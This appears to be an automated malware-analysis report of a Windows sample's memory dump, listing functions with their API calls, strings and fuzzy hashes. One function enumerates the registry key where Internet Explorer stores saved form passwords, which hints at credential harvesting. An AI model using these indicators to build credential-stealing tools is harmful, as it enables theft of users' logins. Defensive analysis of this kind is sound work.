Opcode Fuzzy Hash: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
Instruction Fuzzy Hash: 87616630408342DBDB68AF11D64852FB7B1FF84755F90093FF482A22D0D7B88989DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00409B7A, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED

memset.MSVCRT ref: 00409BC2

Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7

free.MSVCRT(000000FF,?,000000FF,00000000,00000104,747DF560), ref: 00409C90

Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E

Part of subcall function 00408FFD: wcslen.MSVCRT ref: 0040900C
Part of subcall function 00408FFD: _memicmp.MSVCRT ref: 0040903A

_snwprintf.MSVCRT ref: 00409C5C

Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44

Strings

Containers, xrefs: 00409B9A
ContainerId, xrefs: 00409C01
Name, xrefs: 00409C0E
Container_%I64d, xrefs: 00409C4B
, xrefs: 00409BDD

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
String ID: $ContainerId$Container_%I64d$Containers$Name
API String ID: 2804212203-2982631422
Opcode ID: 458f178a0aabb52faaaf0f2420e796d1bdb7f513e90acedcde8fbc72f672a8ce
Instruction ID: b0f72644bbd87b50ea7a8f8ee73cfa3b4c243fbe701b8101a2a2b04dab44341a
Opcode Fuzzy Hash: 458f178a0aabb52faaaf0f2420e796d1bdb7f513e90acedcde8fbc72f672a8ce
Instruction Fuzzy Hash: 29319471D042196AEF50EFA5CC45ADEB7F8AF44344F11007BA519B3182DB38AE448B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB24, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

LoadMenuW.USER32 ref: 0040BB4B

Part of subcall function 0040B974: GetMenuItemCount.USER32 ref: 0040B98A
Part of subcall function 0040B974: memset.MSVCRT ref: 0040B9A9
Part of subcall function 0040B974: GetMenuItemInfoW.USER32 ref: 0040B9E5
Part of subcall function 0040B974: wcschr.MSVCRT ref: 0040B9FD

DestroyMenu.USER32(00000000), ref: 0040BB69
CreateDialogParamW.USER32 ref: 0040BBB7
memset.MSVCRT ref: 0040BBD3
GetWindowTextW.USER32 ref: 0040BBE8
EnumChildWindows.USER32 ref: 0040BC13
DestroyWindow.USER32(00000000), ref: 0040BC1A

Part of subcall function 0040B7A3: _snwprintf.MSVCRT ref: 0040B7C8

Strings

caption, xrefs: 0040BBFF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
String ID: caption
API String ID: 1928666178-4135340389
Opcode ID: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
Instruction ID: e22aff4ff37d874dc9406bb5861836d8cb00257f57c634ff68b223b0e4ee6d7d
Opcode Fuzzy Hash: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
Instruction Fuzzy Hash: 6821A172500218ABEF21AF50EC49EAF3B78FF46754F00447AF905A5192DB789990CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 00408AE8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408B09
_snwprintf.MSVCRT ref: 00408B3C
wcslen.MSVCRT ref: 00408B48
memcpy.MSVCRT ref: 00408B60
wcslen.MSVCRT ref: 00408B6E
memcpy.MSVCRT ref: 00408B81

Strings

TK@, xrefs: 00408B0E, 00408B65, 00408B86
%s (%s), xrefs: 00408B31

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)$TK@
API String ID: 3979103747-3557169880
Opcode ID: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
Instruction ID: e896be4b8b4c8dd321127e9193ea498031fb30aa9e34a4c02f498fe4f9df0790
Opcode Fuzzy Hash: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
Instruction Fuzzy Hash: 6F2162B2800118ABDF20DF95CC45E8AB7B8FF44318F05846AEA48A7106DB78E618CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00407CF6, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000,?,0040FF40,00000000), ref: 00407D1B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5), ref: 00407D39
wcslen.MSVCRT ref: 00407D46
wcscpy.MSVCRT ref: 00407D56
LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000), ref: 00407D60
wcscpy.MSVCRT ref: 00407D70

Strings

Unknown Error, xrefs: 00407D68
netmsg.dll, xrefs: 00407D16

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: Unknown Error$netmsg.dll
API String ID: 2767993716-572158859
Opcode ID: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
Instruction ID: f6f7092b450fef05d0d872bf5e04b1357ca4228fed94eee9f5e7a838667149bb
Opcode Fuzzy Hash: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
Instruction Fuzzy Hash: D201F771A041147BFB1527A0EC4AFAF7B6CDF567A1F20003AF506B10D1EA786E00D6AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC8A, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254

wcscpy.MSVCRT ref: 0040BCA4
wcscpy.MSVCRT ref: 0040BCB4
GetPrivateProfileIntW.KERNEL32 ref: 0040BCC5

Part of subcall function 0040B82A: GetPrivateProfileStringW.KERNEL32 ref: 0040B846

Strings

TranslatorURL, xrefs: 0040BCFD
general, xrefs: 0040BCA9
TranslatorName, xrefs: 0040BCE9
charset, xrefs: 0040BCD3
rtl, xrefs: 0040BCBF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
Instruction ID: d09d9999bd57a78b58a4055e383115949195630bbf49bad653da3d74dfc2830b
Opcode Fuzzy Hash: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
Instruction Fuzzy Hash: 8AF0C232EC0A5137EB1137221D03F2A2608CF92B57F15847BB904762D3DA7C4A15D2DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042EE6A, Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042EF2E
memset.MSVCRT ref: 0042EF69

Strings

database is already attached, xrefs: 0042EF94
cannot ATTACH database within transaction, xrefs: 0042EED9
database %s is already in use, xrefs: 0042EF3B
out of memory, xrefs: 0042F0D8
too many attached databases - max %d, xrefs: 0042EEC3
attached databases must use the same text encoding as main database, xrefs: 0042EFE2
unable to open database: %s, xrefs: 0042F0C1

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
Instruction ID: af9b9ef2f5a1795804296138b741be62980529f77760b3752da5ffa5b8d2aff6
Opcode Fuzzy Hash: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
Instruction Fuzzy Hash: E991E370B00311EFEB10DF66D581BAAB7F0AF44308F94846FE8559B242D778E945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C33A, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166

??2@YAPAXI@Z.MSVCRT ref: 0040C37A
??2@YAPAXI@Z.MSVCRT ref: 0040C396
memcpy.MSVCRT ref: 0040C3BB
memcpy.MSVCRT ref: 0040C3CF
??2@YAPAXI@Z.MSVCRT ref: 0040C452
??2@YAPAXI@Z.MSVCRT ref: 0040C45C
??2@YAPAXI@Z.MSVCRT ref: 0040C494

Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419

Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE

Strings

d, xrefs: 0040C473
8"E, xrefs: 0040C3A7, 0040C3C0, 0040C41C, 0040C3B1, 0040C3C8

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: 8"E$d
API String ID: 1140211610-2418960419
Opcode ID: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
Instruction ID: ebdbfbf94f53a3690cf38ac0907b9363cbed6c4ceb444703d02dc3853126dfb0
Opcode Fuzzy Hash: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
Instruction Fuzzy Hash: 3851AE726007049FD724DF29C586B5AB7E4FF48314F10862EE95ADB391DB78E5408B48

Uniqueness

Uniqueness Score: -1.00%

Function 004171A2, Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004171FA
Sleep.KERNEL32(00000001), ref: 00417204
GetLastError.KERNEL32 ref: 00417216
UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004172EE

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
Instruction ID: b1728a7637de8f6c0c3372c087848d546b31592ea547c84e90bff2a5ea0aeb9c
Opcode Fuzzy Hash: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
Instruction Fuzzy Hash: 2F41F27550C702AFE7218F20DC01BA7B7F1AB90B14F20496EF59552381DBB9D9C68B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00417E39, Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E63
GetFileAttributesW.KERNEL32(00000000), ref: 00417E6A
GetLastError.KERNEL32 ref: 00417E77
Sleep.KERNEL32(00000064), ref: 00417E8C
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E95
GetFileAttributesA.KERNEL32(00000000), ref: 00417E9C
GetLastError.KERNEL32 ref: 00417EA9
Sleep.KERNEL32(00000064), ref: 00417EBE
free.MSVCRT(00000000), ref: 00417EC7

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AttributesDeleteErrorLastSleep$free
String ID:
API String ID: 2802642348-0
Opcode ID: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
Instruction ID: 47bfd0c0f8263ce6d61c00ded009a165ca5b61f2fc3d609cfbcfb361f1c4a64c
Opcode Fuzzy Hash: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
Instruction Fuzzy Hash: 1711063D5087149FCA2027706CC86BF36F49B57772B2102AAF953922D1DB2D4CC1956D

Uniqueness

Uniqueness Score: -1.00%

Function 004147A8, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004147DF
memcpy.MSVCRT ref: 0041480B
memcpy.MSVCRT ref: 00414825

Strings

&, xrefs: 00414805
", xrefs: 004147D9
>, xrefs: 004147CA
<br>, xrefs: 0041481F
°, xrefs: 004147F6
<, xrefs: 004147BC

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
Instruction ID: 1058aa724a71ea66541b56df80d5a3cdc90ec5801de880f61679d0e38116f1b7
Opcode Fuzzy Hash: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
Instruction Fuzzy Hash: 2901927AE542A1A5F63031094C86FF74198DBE3B15FB14127FA96252C5E28D49C382AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040A56F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA

Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62

Part of subcall function 00408EE8: free.MSVCRT(?,00000000,?,0040923F,00000000,?,00000000), ref: 00408EF7

memset.MSVCRT ref: 0040A5DF
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 0040A60D
_wcsupr.MSVCRT ref: 0040A627

Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44

memset.MSVCRT ref: 0040A676
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 0040A6A1
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040A6AE

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A58C

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 4131475296-680441574
Opcode ID: 44a17b0fae2e66326d3e2503c173478f0aec1c0523b0dfda06b815c5dcd27038
Instruction ID: 4ff845341dcd1a768bfc42e85b7312ef223b671260cd3b9f040e87321517091f
Opcode Fuzzy Hash: 44a17b0fae2e66326d3e2503c173478f0aec1c0523b0dfda06b815c5dcd27038
Instruction Fuzzy Hash: AB413BB694021DABDB00EF99DC85EEFB7BCAF58304F10417AB504F2191DB789B458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B301, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
wcscpy.MSVCRT ref: 0040B382

Part of subcall function 0040B7F3: memset.MSVCRT ref: 0040B806
Part of subcall function 0040B7F3: _itow.MSVCRT ref: 0040B814

wcslen.MSVCRT ref: 0040B3A0
GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
memcpy.MSVCRT ref: 0040B419

Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B299
Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2F3

Strings

strings, xrefs: 0040B378

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
Instruction ID: c57a50961ac065af18f7b97b0dfcf96f0970c66ac6ac5239858a4cd79fa145fe
Opcode Fuzzy Hash: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
Instruction Fuzzy Hash: 35415975200701BBDB259F14FC9593A3365E784387B20453EE802A73A3DB39EA16DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA65, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BA8A
GetDlgCtrlID.USER32 ref: 0040BA95
GetWindowTextW.USER32 ref: 0040BAAC
memset.MSVCRT ref: 0040BAD3
GetClassNameW.USER32 ref: 0040BAEA
_wcsicmp.MSVCRT ref: 0040BAFC

Part of subcall function 0040B93B: memset.MSVCRT ref: 0040B94E
Part of subcall function 0040B93B: _itow.MSVCRT ref: 0040B95C

Strings

sysdatetimepick32, xrefs: 0040BAF6

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
Instruction ID: cf2ea30055fd2b250d8a38ac5c403ff02bed82fd0d2b8d5d11e07c443477a94e
Opcode Fuzzy Hash: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
Instruction Fuzzy Hash: D31177325002197BEB20EB91DC8AEEF777CEF45750F404066F509E1192EB749A41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0F4, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041B22C
memcpy.MSVCRT ref: 0041B23E
memcpy.MSVCRT ref: 0041B256
memcpy.MSVCRT ref: 0041B273
memcpy.MSVCRT ref: 0041B28B
memset.MSVCRT ref: 0041B358

Strings

-journal, xrefs: 0041B250
-wal, xrefs: 0041B285

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID: -journal$-wal
API String ID: 438689982-2894717839
Opcode ID: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
Instruction ID: 74a332e22f0b607a266e47b82b9d8ba1ef45136a3b8be849caa08d0d2b66e2c9
Opcode Fuzzy Hash: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
Instruction Fuzzy Hash: DCA1C071A0464AEFDB14DF64C8417DEBBB0FF04314F14826EE46997381D738AAA4CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004050AF, Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00405153
GetDlgItem.USER32 ref: 00405166
GetDlgItem.USER32 ref: 0040517B
GetDlgItem.USER32 ref: 00405193
EndDialog.USER32(?,00000002), ref: 004051AF
EndDialog.USER32(?,00000001), ref: 004051C4

Part of subcall function 00404E6E: GetDlgItem.USER32 ref: 00404E7B
Part of subcall function 00404E6E: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E90

SendDlgItemMessageW.USER32 ref: 004051DC
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 004052ED

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
Instruction ID: 2cde12ba5927d4bde9809f16a4ff1e8400ea1fd37873b15a8c1cc8d9e94e8744
Opcode Fuzzy Hash: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
Instruction Fuzzy Hash: 6961B030600B05ABDB31AF25CC86B6B73A5FF50324F00863EF515AA6D1D778A951CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00443EEF, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00443F6F
_wcsicmp.MSVCRT ref: 00443F84
_wcsicmp.MSVCRT ref: 00443F99

Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3

Strings

https://, xrefs: 00443F31
log profile, xrefs: 00443EFD
.save, xrefs: 00443F69
http://, xrefs: 00443F26
signIn, xrefs: 00443F93

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp$wcslen$_memicmp
String ID: .save$http://$https://$log profile$signIn
API String ID: 1214746602-2708368587
Opcode ID: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
Instruction ID: 597a29036d5ddd155e475e5b18437da6987c3908216f6d337c400390a4fd9aac
Opcode Fuzzy Hash: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
Instruction Fuzzy Hash: A54135758087018AF7309EA5D94076773D8DB84B26F208D3FE56AE36C1EEBCE958411E

Uniqueness

Uniqueness Score: -1.00%

Function 004052FD, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040530D
??3@YAXPAX@Z.MSVCRT ref: 00405329
??2@YAPAXI@Z.MSVCRT ref: 0040534F
memset.MSVCRT ref: 0040535F
??2@YAPAXI@Z.MSVCRT ref: 0040538E
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 004053DB
SetFocus.USER32(?,?,?,?), ref: 004053E4
??3@YAXPAX@Z.MSVCRT ref: 004053F4

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
Instruction ID: 5d7335f69ca4f594208563f7014043d8df0e1bea6ea55c180c5050c90dc7a29e
Opcode Fuzzy Hash: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
Instruction Fuzzy Hash: E931A4B1500A01AFEB14AF69C98691AB7A4FF04354710453FF545E7691DB78EC90CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040547A, Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00405491
GetWindow.USER32(?,00000005), ref: 004054A9
GetWindow.USER32(00000000), ref: 004054AC

Part of subcall function 00401735: GetWindowRect.USER32 ref: 00401744

GetWindow.USER32(00000000,00000002), ref: 004054B8
GetDlgItem.USER32 ref: 004054CE
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040550D
GetDlgItem.USER32 ref: 00405517
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405566

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$ItemMessageRectSend$Client
String ID:
API String ID: 2047574939-0
Opcode ID: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
Instruction ID: ee080d675ccdbf70b04d6128f25a7e8090f7ef981af0433368dbc7d1a9e2eb74
Opcode Fuzzy Hash: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
Instruction Fuzzy Hash: AB218071690B0977EA0137229D86F6B366DEF96714F10003AFA007B2C2EEBA580245AD

Uniqueness

Uniqueness Score: -1.00%

Function 00418137, Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00418151
memcpy.MSVCRT ref: 00418160
GetCurrentProcessId.KERNEL32 ref: 00418171
memcpy.MSVCRT ref: 00418184
GetTickCount.KERNEL32 ref: 00418198
memcpy.MSVCRT ref: 004181AB
QueryPerformanceCounter.KERNEL32(?), ref: 004181C1
memcpy.MSVCRT ref: 004181D1

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4218492932-0
Opcode ID: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
Instruction ID: d236c1b17a1aae76216467299f6e18822a0d202c31a727bef5ceca0d2f67f94c
Opcode Fuzzy Hash: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
Instruction Fuzzy Hash: B31184B3D005186BDB00EFA4DC49EDAB7ACEB5A210F454937FA15DB141E638E6448798

Uniqueness

Uniqueness Score: -1.00%

Function 00407F32, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F3A
wcslen.MSVCRT ref: 00407F47
GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040F25C,-00000210), ref: 00407F57
GlobalLock.KERNEL32 ref: 00407F64
memcpy.MSVCRT ref: 00407F6D
GlobalUnlock.KERNEL32(00000000), ref: 00407F76
SetClipboardData.USER32 ref: 00407F7F
CloseClipboard.USER32 ref: 00407F8F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
String ID:
API String ID: 1213725291-0
Opcode ID: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
Instruction ID: 8669bfd28652b36aabcc6f95cbac9fd564b8d5c2b1f3dd921f492192fb7780cb
Opcode Fuzzy Hash: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
